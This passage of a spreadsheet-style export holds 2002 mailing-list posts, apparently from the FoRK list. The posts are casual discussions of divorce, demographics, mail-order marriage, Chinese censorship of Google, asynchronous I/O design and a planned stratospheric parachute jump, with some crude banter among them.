we have any statistics on the poor man's divorce from
centuries past? Are you so sure that the kids in 18th
century England were any more "functional" than those
today? What about 20th century Saudi Arabia?&gt;At least from the viewpoint of demographics sustainability and 
&gt;counterpressure to gerontocracy and resulting innovatiophobia we're doing
&gt;something wrong.Granting your first two points, I'm skeptical about
the last. Do you see ANY signs that America specifically
or the west generally are suffering from lack of
innovation, vis-a-vis youth nations such as Iran? The
last I read, the third generation of the revolution all
(a) want to move to America, and (b) failing that, are
importing everything they can American.
_________________________________________________________________
Join the worldï¿½s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, Russell Turpin wrote:&gt; Don't swallow too quickly what you have read about
&gt; more traditional cultures, today or in the past. DoI don't swallow ;&gt;I was just offering anecdotal first-hand experiences from a number of
cultures indicating 1) we apparently have a problem 2) which requires more
than ad hoc hand-waving approach (it's trivial! it's obvious! all we have
to do is XY!).&gt; we have any statistics on the poor man's divorce from
&gt; centuries past? Are you so sure that the kids in 18thThat's easy. Divorce didn't happen. The church and the society looked
after that. Only relatively recently that privilege was granted to kings, 
and only very recently to commoners.&gt; century England were any more "functional" than those
&gt; today? What about 20th century Saudi Arabia?Is Saudi Arabia a meaningful emigration source?
&gt; &gt;At least from the viewpoint of demographics sustainability and 
&gt; &gt;counterpressure to gerontocracy and resulting innovatiophobia we're doing
&gt; &gt;something wrong.
&gt; 
&gt; Granting your first two points, I'm skeptical about
&gt; the last. Do you see ANY signs that America specificallyI wasn't talking about the US specifically. (Though the demographics 
problem exists there as well, albeit not in that extent we Eurotrash are 
facing right now).&gt; or the west generally are suffering from lack of
&gt; innovation, vis-a-vis youth nations such as Iran? The1) I'm seeing lack of innovation, and -- more disturbing -- trend towards
even less innovation by an autocatalytic process (gerontocracy favors
gerontocracy).&gt; last I read, the third generation of the revolution all
&gt; (a) want to move to America, and (b) failing that, are
&gt; importing everything they can American.My point was that the west, US first and foremost, importing innovation
carriers and working against bad trend in the demographics by large scale
import. While this kinda, sorta works on the short run, this is not
something sustainable.
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,We're looking for an experienced IT support person in the School of
Engineering at UC Santa Cruz -- please foward to anyone who you think might
be interested.- Jim-----Original Message-----
From: Michael Perrone [mailto:mperrone@cs.ucsc.edu]
Sent: Thursday, September 05, 2002 12:31 PM
To: techstaff@cse.ucsc.edu
Subject: Recruiting for PAIII-IV SupervisorDear SoE Community,Forgive the spam, but I wanted to make sure that everyone is aware that
we are recruiting to replace the position vacated by Gary Moro.This is a technical position with supervisor responsibilities. The focus is
on Solaris and Linux systems administration with Veritas and Irix experience
a plus.The posting is here:http://www2.ucsc.edu/staff_hr/employment/listings/020809.htmRegards,Michael Perrone
</t>
  </si>
  <si>
    <t xml:space="preserve">
Related anecdote:I was eating in a restaurant in chinatown in Boston.  The place was empty.  
The only other customer was a white guy reading an asian-language 
newspaper.  The guy asked the waiter for help translating a word.  
Eventually his story came out.He had married an asian woman through one of these introduction services.  
after about a year of marriage she had charged him with assault and left
him, leaving no contact information.  He was hanging around in Chinatown,
asking random asians for help finding her.I obviously don't know if he did assault her, but what struck me was that
the possibility of mutual exploitation is high.Anecdote number two:In college I had a job as a street vendor.  There was a guy I worked with
who was a lifer in the job.  He was a noticably messed up guy.  Among
other odd characteristics he fawned on women customers, doing stuff like
offering them flowers.I asked him about it.  He said that he'd never had sex with a woman who
wasn't a prostitute, and his dream was to save up enough money to get a
mail order bride.I was really moved.  The guy was a loon, but he wanted a companion as much
as anyone else and he was realistic about his chances.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;From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interesting.http://www.cs.huji.ac.il/~springer/
</t>
  </si>
  <si>
    <t xml:space="preserve">Turpin:
&gt;&gt;Do we have any statistics on the poor man's divorce from centuries past?Eugen Leitl:
&gt;That's easy. Divorce didn't happen.You seem not to know what a "poor man's divorce" is.
It is an old term, from the time when divorce was
difficult, but walking was easy, and identity was
not so locked down as it is today. Not every widow
had a dead husband.&gt;I'm seeing lack of innovation ..That doesn't tell us anything except what is
happening in Eugen Leitl's life. The more common
observation is that the rate of change is increasing.
Do you have any data that might persuade us that what
you see is more telling than what others see?&gt;gerontocracy favors gerontocracy.I would have thought that gerontocracy favors biotech
research and plenty of young workers to pay taxes.
Note that the fertility rate doesn't result from
decisions made by the old, but by the young. If we
want more kids, we have to convince people who are
in their twenties to become parents.
_________________________________________________________________
Join the worldï¿½s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, Russell Turpin wrote:&gt; You seem not to know what a "poor man's divorce" is.I know very little in general. I hope you can excuse me for that.&gt; It is an old term, from the time when divorce was
&gt; difficult, but walking was easy, and identity was
&gt; not so locked down as it is today. Not every widow
&gt; had a dead husband.Yeah,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commonYeah, I happen to live in a small hole, under the roots of an old oak 
tree. You don't, so innovation is a global phenomenon.&gt;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taxes.So thought I, but apparently all it favours is a lot of whining about good
old times, the inability of youngn's to pay for your pension and the
health insurance, and the generic influx of uncouth furriners, which must 
be stopped, Somehow.&gt; Note that the fertility rate doesn't result from
&gt; decisions made by the old, but by the young. If weUh, I'm kinda aware of that.&gt; want more kids, we have to convince people who are
&gt; in their twenties to become parents.Now we're talking. Got a plan?
</t>
  </si>
  <si>
    <t xml:space="preserve">Originally linked by Dave's Scripting News:http://www.megnut.com/archive.asp?which=2002_09_01_archive.inc#000194We've got Googlewhacking, Googlebombing and now we can add Googlecooking to
our lexicon. My mother types whatever ingredients she has on hand into
Google and then picks the most appealing recipe returned in the results.
What a good idea!- Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">http://oposite.stsci.edu/pubinfo/pr/2002/21/
(Shows a picture of a wheel within a wheel galaxy).The universe is a strange and wonderful place.- Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, Russell Turpin wrote:
--]want more kids, we have to convince people who are
--]in their twenties to become parents.
--]Hey give me a break, I was working on finding the right mate. Once I did,
boomsky theres a puppy and if you would kindly not put on So much preasure
there culd well be another.
3 is a magic number...yes it is , its a magic number
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;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etc.Europe did not show the same increase in fertility.Some actual data for the US are here:http://www.census.gov/population/pop-profile/2000/chap04.pdf
Part of:
http://www.census.gov/population/www/pop-profile/profile2000.html- Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">In a slightly old news story, it turns out the Chinese government has banned
all access to the Google and AltaVista search engines.http://www.nytimes.com/2002/09/04/international/asia/04BEIJ.html
http://www.bayarea.com/mld/bayarea/business/3996218.htm
http://news.bbc.co.uk/1/hi/technology/2233229.stm
http://news.bbc.co.uk/1/hi/technology/2238236.stmThe reason appears to be the Google cache feature. I can only imagine the
Internet Archive will soon follow, if it isn't already blocked.Seems that governments do have some power over the Web, after all.- Jim
</t>
  </si>
  <si>
    <t>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Google.When the garden was in full bloom a few summers back Dawn and I would
google the ingrediants we just grew to come up with tasty recipes, or more
often ideas from recipes from which toi make our own.Fight the hypebuzzword war, be an army of one:)--tom (iron che tempah)wsmf</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Wrong, [VMS-like async io] makes a huge difference in even what I
&gt; consider small programs.So it sounds as if, to your thinking,
most useful apps are also trivial. 
Unless each key on my keyboard were
(to the apps) distinct event sources,
I can't think of any of my usual job
mix that would need hundreds, or even
tens, of async requests; perhaps you
can explain how nontrivial apps will
be compellingly useful? &gt; but it's still not built in, who knows when it will be. The point is it's
&gt; not portable in either case.Does that lack of portability imply it
isn't generally useful?  (When it was
apparent that TCP networks were useful,
berkeley sockets could be found even
on VMS and Win 3.1 boxen)Why would early Unix have run with the
idea that, if one wishes to do multiple
things at the same time, one can use a
group of processes to do them?- they had Multics as a counterexample?- in the days of tiny memories and tapes,
  people were more accustomed to writing
  programs that didn't run entirely in a
  single address space?- one is a great number for an interface,
  as log(1) is 0, and specification can
  be implicit?- some combination of the above?Now, as Hoare says:
&gt; There are two ways of constructing a software design.  One way is to make
&gt; it so simple that there are obviously no deficiencies and the other is to
&gt; make it so complicated that there are no obvious deficiencies.As programmers, we've been able to make
our lives complicated for at least half
a century; the hardware interrupt gives
us the rope.Part of Dijkstra's inspiration for THE
was the counterexample of IBM's multi-
programmed boxes (were these the same
ones that inspired Mythical Man Month?)
and I suppose he would say the question
is how not to make a mess of it -- how
should we structure computations so if
we try to do ten times as many things
at the same time, reasoning about the
resulting system is at most ten times
more complex -- not one hundred, and
certainly not three and a half million
times more.Compared to that project, the prospect
of writing a driver library for various
vendors' aio implementations seems to
be truly trivial.-Dave(Oracle, in their quest for portability,
used to use raw disks for the database.
This finessed the filesystem issue; did
it also allow them to roll their own set
of async drivers?)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, Eugen Leitl wrote:&gt; On Fri, 6 Sep 2002, CDale wrote:
&gt; 
&gt; &gt; It also depends on what the fad is or what is in style.  (:
&gt; 
&gt; DNA's idea of fads is on the 100 kiloyear scale, unfortunately. As long as
&gt; current fads don't involve in-vivo rewrite of the genome, homeoboxes
&gt; including (now there's a problem for you, homeoboxing the adult), they're
&gt; not all that smart an idear.I forgot what we were taking about.  (:&gt;  
&gt; &gt; Actualy our silly antiquated ideas about relationships and love have
&gt; &gt; resulted in the bleedings of many upon many a page (and musical
&gt; &gt; instrumnet, and canvas)  What's the problem if we dash a little Mrs.
&gt; 
&gt; Art is sure nice. However, if art is our first priority we're kinda
&gt; fux0red, if we've set our sight on a sustainable culture.Nah, didn't say art's our priority.  Said our ideas about relationships 
and love are.  &gt; &gt; And let me tell you this: just because a child happens to be
&gt; &gt; single-parented (what a word), does not mean that child is
&gt; &gt; dysfunctional or lives in a dysfunctional home.  The govt/media/church
&gt; 
&gt; Our firmware is not built to be single-parented. You can counteract that
&gt; somewhat by exposing the kid to a community of close friends, but not too
&gt; many do that.I see it a lot in the south. Also family.&gt; 
&gt; &gt; has tried to make it look like there is a disintegration, when in
&gt; &gt; fact, there is a coming together of other family members and friends
&gt; &gt; to raise children.  It's not decaying -- it's changing.  Nothing wrong
&gt; &gt; with change.
&gt; 
&gt; I don't know what exactly is wrong, but something is definitely wrong.  
&gt; This is way too important to be left to just our intuition of what is
&gt; right and what is wrong.One thing that's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9.  She's got her 
own place now, and still doesn't have one.  YaY!  Another thing that's 
wrong is what goes on in public schools.  Some allow a bit of 
individuality, but only for a class or a short period of time, depending 
on the teachers, most of the time.  I dunno how many times I've seen Xi 
come home from school absolutely miserable or outraged about something 
that happened at school.  She made it to college, though, whew.  It's a 
big problem to tackle, and I don't know the answer.  I like the idea of 
the voucher system, because in a way it is a way parents can vote more 
efficiently for how their kids are taught. 
&gt;   &gt; &gt; &gt; At least from the viewpoint of demographics sustainability and
&gt; &gt; &gt; counterpressure to gerontocracy and resulting innovatiophobia we're doing
&gt; &gt; &gt; something wrong.
&gt; &gt; &gt; 
&gt; &gt; &gt; Maybe we should really go dirty Tleilaxu all the way.
&gt; &gt; &gt; 
&gt; &gt; 
&gt; &gt; Maybe y'all should buy m-w some more bandwidth.
&gt; 
&gt; m-w?
&gt; 
merriam-webster.  (:
C-- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Jim Whitehead  writes:    J&gt; Seems that governments do have some power over the
    J&gt; Web, after all.At the 1993 ITAC "Roadwork" Conference, Peter Mansbridge asked the
panel of experts how it might be possible to censor the internet.  All
of the panelists laughed except Bill Buxton.  Peter asked him if he
knew something the others didn't.  Bill replied that it /was/ possible
to censor the internet, which drew a gasp from the audience. "All you
need is a global government more Draconian than any that has occured
before in history"Scientology DMCA suits against Norwegians, legal RIAA file-trading
virii, Bush's Homeland Insecurity, Canada using ISPs as spies, RIAA
suing Prodigy for P2P users and having Foreign sites barred from the
US, France tempers Yahoo, China IP-filters Google ... Seems Bill didn't know much about how Government really works.  Either
that, or there's a smelly similarity between Buxton's global Big
Brother and the US and Chinese.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">quitcherbraggin.:-)
gg-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
Sent: Friday, September 06, 2002 3:42 AM
To: bitbitch@magnesium.net
Cc: Adam L. Beberg; fork@spamassassin.taint.org
Subject: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
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(:On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:&gt;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
&gt; situations are great, provided everyone is aware that the relationship
&gt; is a contractual one -- he wants a maid, a dog and a prostitute he
&gt; doesn't have to pay, and she wants a country that isn't impoverished
&gt; and teeming with AIDS.  A contract, versus a true love-interest
&gt; marriage.
&gt;
&gt; Egh.  I really need to stop analyzing your posts to this extent.   I
&gt; blame law school and my cat.
&gt;
&gt; -BB
&gt;
&gt; ALB&gt; - Adam L. "Duncan" Beberg
&gt; ALB&gt;   http://www.mithral.com/~beberg/
&gt; ALB&gt;   beberg@mithral.com
&gt;
&gt;
&gt;
&gt;
&gt;
&gt;--
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t>I recently stumbled across the contents of the journal, "Electronic
Publishing", which was published from January, 1988 through December, 1995.
All papers are available online in PDF (this was apparently one of the first
journals to disseminate in PDF, in 1994). The journal also reprints some of
the better papers from the Electronic Publishing conferences, held bi-yearly
from 1986-1992 (EP86, EP88, EP90, EP92).http://cajun.cs.nott.ac.uk/compsci/epo/papers/epoddtoc.htmlToday's reader might look at the contents and wonder about their relevance,
since they don't directly discuss the Web. As an academic, I find this
journal valuable, since the papers are of generally high quality (by top
researchers), and they provide lots of pointers to the evolution of the
ideas that led to many Web technologies.  It's one source among many for
sifting through the intellectual lineage of electronic publishing
technologies.Rohit and Adam might find the following papers especially relevant, in the
context of their WWW7 "Evolution of Document Species" paper:Page Description Languages: Development, Implementation and Standardization:
A. L. Oakley and A. C. Norris
http://cajun.cs.nott.ac.uk/compsci/epo/papers/volume1/issue2/epalo012.pdfImportant papers in the history of document preparation systems: basic
sources:
Richard K. Furuta
http://cajun.cs.nott.ac.uk/compsci/epo/papers/volume5/issue1/ep057rf.pdf
(Excellent overview of sources)Several of the authors of papers in this journal are now involved in the ACM
Document Engineering conference series:
http://www.documentengineering.org/- Jim</t>
  </si>
  <si>
    <t xml:space="preserve">Why should I?  (:
COn Fri, 6 Sep 2002, Geege Schuman wrote:&gt; quitcherbraggin.
&gt; 
&gt; :-)
&gt; gg
&gt; 
&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
&gt; Sent: Friday, September 06, 2002 3:42 AM
&gt; To: bitbitch@magnesium.net
&gt; Cc: Adam L. Beberg; fork@spamassassin.taint.org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one another for the satisfaction of being together.   I
&gt; &gt; know, far-fetched and idealistically crazy as it is, but such things
&gt; &gt; do happen.   I can guarantee you, if my mother was approached by my
&gt; &gt; father, and 25 years ago, he commented on her cleaning ability as a
&gt; &gt; motivator for marrying her, we would not be having this conversation
&gt; &gt; now.
&gt; &gt;
&gt; &gt; If guys still have silly antequated ideas about 'women's role' then
&gt; &gt; their opportunities for finding women _will_ be scarce.   Again, these
&gt; &gt; situations are great, provided everyone is aware that the relationship
&gt; &gt; is a contractual one -- he wants a maid, a dog and a prostitute he
&gt; &gt; doesn't have to pay, and she wants a country that isn't impoverished
&gt; &gt; and teeming with AIDS.  A contract, versus a true love-interest
&gt; &gt; marriage.
&gt; &gt;
&gt; &gt; Egh.  I really need to stop analyzing your posts to this extent.   I
&gt; &gt; blame law school and my cat.
&gt; &gt;
&gt; &gt; -BB
&gt; &gt;
&gt; &gt; ALB&gt; - Adam L. "Duncan" Beberg
&gt; &gt; ALB&gt;   http://www.mithral.com/~beberg/
&gt; &gt; ALB&gt;   beberg@mithral.com
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; 
&gt; --
&gt; "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
&gt; 
&gt; 
&gt; 
&gt; 
&gt; -- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday 06 September 2002 06:16 am, Eugen Leitl wrote:
&gt; I don't know what exactly is wrong, but something is definitely wrong.  
&gt; This is way too important to be left to just our intuition of what is
&gt; right and what is wrong.This is one of those formally difficult points from a philosophy 
perspective.   You can't really throw out intuition and emotion because 
reason really only gets you answers that reflect the genome and the 
ancestral environment.   Going forward requires creativity and experiment.Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">If it's unwritten, how'm I supposed to know unless someone CALLS me up and 
tells me/  hint hint.  LOL  (:  Well, I reckon it's a written rule now, 
since it's on the internet in text format w/ your name attached, but then 
again, when have I ever followed any damned rules???  (:
COn Sat, 7 Sep 2002, Geege Schuman wrote:&gt; unwritten rule.  8-)
&gt; 
&gt; gg
&gt; 
&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
&gt; Sent: Friday, September 06, 2002 10:21 PM
&gt; To: Geege Schuman
&gt; Cc: bitbitch@magnesium.net; Adam L. Beberg; fork@spamassassin.taint.org
&gt; Subject: RE: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
&gt; 
&gt; 
&gt; Why should I?  (:
&gt; C
&gt; 
&gt; On Fri, 6 Sep 2002, Geege Schuman wrote:
&gt; 
&gt; &gt; quitcherbraggin.
&gt; &gt;
&gt; &gt; :-)
&gt; &gt; gg
&gt; &gt;
&gt; &gt; -----Original Message-----
&gt; &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
&gt; &gt; Sent: Friday, September 06, 2002 3:42 AM
&gt; &gt; To: bitbitch@magnesium.net
&gt; &gt; Cc: Adam L. Beberg; fork@spamassassin.taint.org
&gt; &gt; Subject: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
&gt; &gt;
&gt; &gt;
&gt; &gt; I dunno, BB.  Women who like to be thought of this way should have the
&gt; &gt; right to choose to be treated this way.  Men too...  ahem.  (:  My boy
&gt; &gt; cleans, washes clothes, cooks, fixes stuff, etc, and works the same number
&gt; &gt; of hours I do, sometimes more, if he has to catch up with me.  (:  I
&gt; &gt; close him because he is industrious and creative, and because he
&gt; &gt; unfailingly makes my bed the minute I get out of it.  And boy #2 will be
&gt; &gt; here soon to help boy #1 with other things such as pedicures,  backrubs,
&gt; &gt; and sure, fucking.  LOL! (along with the aforementioned "chores") Adam can
&gt; &gt; have his cake and eat it too, if he can only find the right girl who has
&gt; &gt; the same beliefs about gender  roles that he has. Of course, he has NO
&gt; &gt; clue where to look, so we will be constantly laughing at him while he
&gt; &gt; stumbles around in the dark.
&gt; &gt; Cindy
&gt; &gt; P.S. the numbers do not in any way indicate importance or favor -- only
&gt; &gt; the order in which they move into my house.  -smiles at chris-
&gt; &gt; P.S. #2.  I'm moving.   Going to New Orleans.  Can't handle any more cab
&gt; &gt; driving.  The summer sucked here on the MS Gulf Coast, instead of rocking
&gt; &gt; like it normally does.  Wish me luck.  I'm going to look for another
&gt; &gt; computer job.  Le Sigh.  (:
&gt; &gt;
&gt; &gt; On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
&gt; &gt;
&gt; &gt; &gt; Hello Adam,
&gt; &gt; &gt;
&gt; &gt; &gt; Thursday, September 05, 2002, 11:33:18 PM, you wrote:
&gt; &gt; &gt;
&gt; &gt; &gt;
&gt; &gt; &gt; ALB&gt; So, you're saying that product bundling works? Good point.
&gt; &gt; &gt;
&gt; &gt; &gt; Sometimes I wish I was still in CA.  You deserve a good beating every
&gt; &gt; &gt; so often...  (anyone else want to do the honors?)
&gt; &gt; &gt;
&gt; &gt; &gt; ALB&gt; And how is this any different from "normal" marriage exactly? Other
&gt; &gt; then
&gt; &gt; &gt; ALB&gt; that the woman not only gets a man, but one in a country where both
&gt; &gt; she and
&gt; &gt; &gt; ALB&gt; her offspring will have actual opportunities? Oh and the lack of
&gt; &gt; &gt; ALB&gt; "de-feminized, over-sized, self-centered, mercenary-minded"
&gt; choices?
&gt; &gt; &gt;
&gt; &gt; &gt; Mmkay.  For the nth time Adam, we don't live in the land of
&gt; &gt; &gt; Adam-fantasy.  Women actually are allowed to do things productive,
&gt; &gt; &gt; independent and entirely free of their male counterparts.  They aren't
&gt; &gt; &gt; forced to cook and clean and merely be sexual vessels.   Sometimes,
&gt; &gt; &gt; and this will come as a shock to you, no doubt, men and women even
&gt; &gt; &gt; find -love- (which is the crucial distinction between this system) and
&gt; &gt; &gt; they marry one another for the satisfaction of being together.   I
&gt; &gt; &gt; know, far-fetched and idealistically crazy as it is, but such things
&gt; &gt; &gt; do happen.   I can guarantee you, if my mother was approached by my
&gt; &gt; &gt; father, and 25 years ago, he commented on her cleaning ability as a
&gt; &gt; &gt; motivator for marrying her, we would not be having this conversation
&gt; &gt; &gt; now.
&gt; &gt; &gt;
&gt; &gt; &gt; If guys still have silly antequated ideas about 'women's role' then
&gt; &gt; &gt; their opportunities for finding women _will_ be scarce.   Again, these
&gt; &gt; &gt; situations are great, provided everyone is aware that the relationship
&gt; &gt; &gt; is a contractual one -- he wants a maid, a dog and a prostitute he
&gt; &gt; &gt; doesn't have to pay, and she wants a country that isn't impoverished
&gt; &gt; &gt; and teeming with AIDS.  A contract, versus a true love-interest
&gt; &gt; &gt; marriage.
&gt; &gt; &gt;
&gt; &gt; &gt; Egh.  I really need to stop analyzing your posts to this extent.   I
&gt; &gt; &gt; blame law school and my cat.
&gt; &gt; &gt;
&gt; &gt; &gt; -BB
&gt; &gt; &gt;
&gt; &gt; &gt; ALB&gt; - Adam L. "Duncan" Beberg
&gt; &gt; &gt; ALB&gt;   http://www.mithral.com/~beberg/
&gt; &gt; &gt; ALB&gt;   beberg@mithral.com
&gt; &gt; &gt;
&gt; &gt; &gt;
&gt; &gt; &gt;
&gt; &gt; &gt;
&gt; &gt; &gt;
&gt; &gt; &gt;
&gt; &gt;
&gt; &gt; --
&gt; &gt; "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; 
&gt; --
&gt; "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
&gt; 
&gt; 
&gt; 
&gt; 
&gt; -- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">CDale URLed thusly:
&gt;http://www.news.harvard.edu/gazette/2000/10.19/01_monogamy.html&gt;The assumption that females of all species tend to be less promiscuous
&gt;than males simply does not fit the facts, Hrdy contended.Well, DUH!!!It is perfectly obvious that (heterosexual) promiscuity is exactly,
precisely identical between males and females.Of course the shapes of the distributions may differ.
R
</t>
  </si>
  <si>
    <t xml:space="preserve">Robert Harley:
&gt;It is perfectly obvious that (heterosexual) promiscuity is exactly, 
&gt;precisely identical between males and females.Yeah,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roost.Maybe it's just me, but that doesn't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http://messenger.msn.com
</t>
  </si>
  <si>
    <t xml:space="preserve">unwritten rule.  8-)gg-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
Sent: Friday, September 06, 2002 10:21 PM
To: Geege Schuman
Cc: bitbitch@magnesium.net; Adam L. Beberg; fork@spamassassin.taint.org
Subject: RE: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
Why should I?  (:
COn Fri, 6 Sep 2002, Geege Schuman wrote:&gt; quitcherbraggin.
&gt;
&gt; :-)
&gt; gg
&gt;
&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
&gt; Sent: Friday, September 06, 2002 3:42 AM
&gt; To: bitbitch@magnesium.net
&gt; Cc: Adam L. Beberg; fork@spamassassin.taint.org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one another for the satisfaction of being together.   I
&gt; &gt; know, far-fetched and idealistically crazy as it is, but such things
&gt; &gt; do happen.   I can guarantee you, if my mother was approached by my
&gt; &gt; father, and 25 years ago, he commented on her cleaning ability as a
&gt; &gt; motivator for marrying her, we would not be having this conversation
&gt; &gt; now.
&gt; &gt;
&gt; &gt; If guys still have silly antequated ideas about 'women's role' then
&gt; &gt; their opportunities for finding women _will_ be scarce.   Again, these
&gt; &gt; situations are great, provided everyone is aware that the relationship
&gt; &gt; is a contractual one -- he wants a maid, a dog and a prostitute he
&gt; &gt; doesn't have to pay, and she wants a country that isn't impoverished
&gt; &gt; and teeming with AIDS.  A contract, versus a true love-interest
&gt; &gt; marriage.
&gt; &gt;
&gt; &gt; Egh.  I really need to stop analyzing your posts to this extent.   I
&gt; &gt; blame law school and my cat.
&gt; &gt;
&gt; &gt; -BB
&gt; &gt;
&gt; &gt; ALB&gt; - Adam L. "Duncan" Beberg
&gt; &gt; ALB&gt;   http://www.mithral.com/~beberg/
&gt; &gt; ALB&gt;   beberg@mithral.com
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt;
&gt; --
&gt; "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
&gt;
&gt;
&gt;
&gt;
&gt;--
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">cdale is a double chocolate chip macadamia to my vanilla wafer.  wait, maybe
i'm a ginger snap.
gg-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
Russell Turpin
Sent: Saturday, September 07, 2002 11:06 AM
To: fork@spamassassin.taint.org
Subject: Re: Selling Wedded Bliss (was Re: Ouch...)
Robert Harley:
&gt;It is perfectly obvious that (heterosexual) promiscuity is exactly,
&gt;precisely identical between males and females.Yeah,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roost.Maybe it's just me, but that doesn't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http://messenger.msn.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Hah.  I guess she doesn't want everyone to know about all the kinky sex 
she and I have had.  LOL
COn Sat, 7 Sep 2002, Geege Schuman wrote:&gt; cdale is a double chocolate chip macadamia to my vanilla wafer.  wait, maybe
&gt; i'm a ginger snap.
&gt; 
&gt; 
&gt; gg
&gt; 
&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
&gt; Russell Turpin
&gt; Sent: Saturday, September 07, 2002 11:06 AM
&gt; To: fork@spamassassin.taint.org
&gt; Subject: Re: Selling Wedded Bliss (was Re: Ouch...)
&gt; 
&gt;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&gt; 
&gt; 
&gt; 
&gt; -- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Oh, well, uh, thank you, Russell.  LOL@#!  (I think?)
COn Sat, 7 Sep 2002, Russell Turpin wrote:&gt;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
</t>
  </si>
  <si>
    <t xml:space="preserve">Definitional nit to pick:Robert Harley writes:
&gt; It is perfectly obvious that (heterosexual) promiscuity is exactly,
&gt; precisely identical between males and females.
&gt; 
&gt; Of course the shapes of the distributions may differ.You've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averages.Consider a population of 3 males and 3 females. Let
there be three pairings which result in each person
having sex once. Then, let one of the males also have 
sex with the other two females. Sure, the average number of sex acts and sex partners
is equal between the sexes, tautologically. But here more women than men are:
 - above the single partner threshold
 - above the overall average 1.67 acts/partners threshold
 - above the overall median 1.5 acts/partners
 - above the overall mode 1 acts/partnersAnd here women have a higher mode (2) and median (2) 
number of partners.So in this contrived population, females are more 
"promiscuous" than males, unless "promiscuity" is 
defined uselessly.- Gordon
</t>
  </si>
  <si>
    <t xml:space="preserve">CDale:
&gt;I guess [Geege] doesn't want everyone to know about all the kinky sex she 
&gt;and I have had.Yeah, like I'm going to believe that without
seeing the photos. Next, you'll be telling me
that Beberg found a job he likes._________________________________________________________________
Join the worldï¿½s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">intersectedness: i'd be surprised if beberg ever had a BLOWjob he liked. i
mean, it would have involved OTHERS, less EVOLVED others.:-)
gg-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
Russell Turpin
Sent: Saturday, September 07, 2002 3:07 PM
To: fork@spamassassin.taint.org
Subject: RE: Selling Wedded Bliss (was Re: Ouch...)
CDale:
&gt;I guess [Geege] doesn't want everyone to know about all the kinky sex she
&gt;and I have had.Yeah, like I'm going to believe that without
seeing the photos. Next, you'll be telling me
that Beberg found a job he likes._________________________________________________________________
Join the worldÂ’s largest e-mail service with MSN Hotmail.
http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Today a French officer called Michel Fournier is supposed to get in a
350-metre tall helium balloon, ride it up to the edge of space (40 km
altitude) and jump out.  His fall should last 6.5 minutes and reach
speeds of Mach 1.5.  He hopes to open his parachute manually at the
end, although with an automatic backup if he is 7 seconds from the
ground and still hasn't opened it.RObQuote:
  "Vederï¿½, si averï¿½ si grossi li coglioni, come ha il re di Franza."
  ("Let's see if I've got as much balls as the King of France!")
  - Pope Julius II, 2 January 1511
</t>
  </si>
  <si>
    <t xml:space="preserve">So uh, would this qualify for the Darwin awards if he doesn't make it?Freaking french people...
   :-)
-BB
RH&gt; Today a French officer called Michel Fournier is supposed to get in a
RH&gt; 350-metre tall helium balloon, ride it up to the edge of space (40 km
RH&gt; altitude) and jump out.  His fall should last 6.5 minutes and reach
RH&gt; speeds of Mach 1.5.  He hopes to open his parachute manually at the
RH&gt; end, although with an automatic backup if he is 7 seconds from the
RH&gt; ground and still hasn't opened it.RH&gt; RRH&gt; ObQuote:
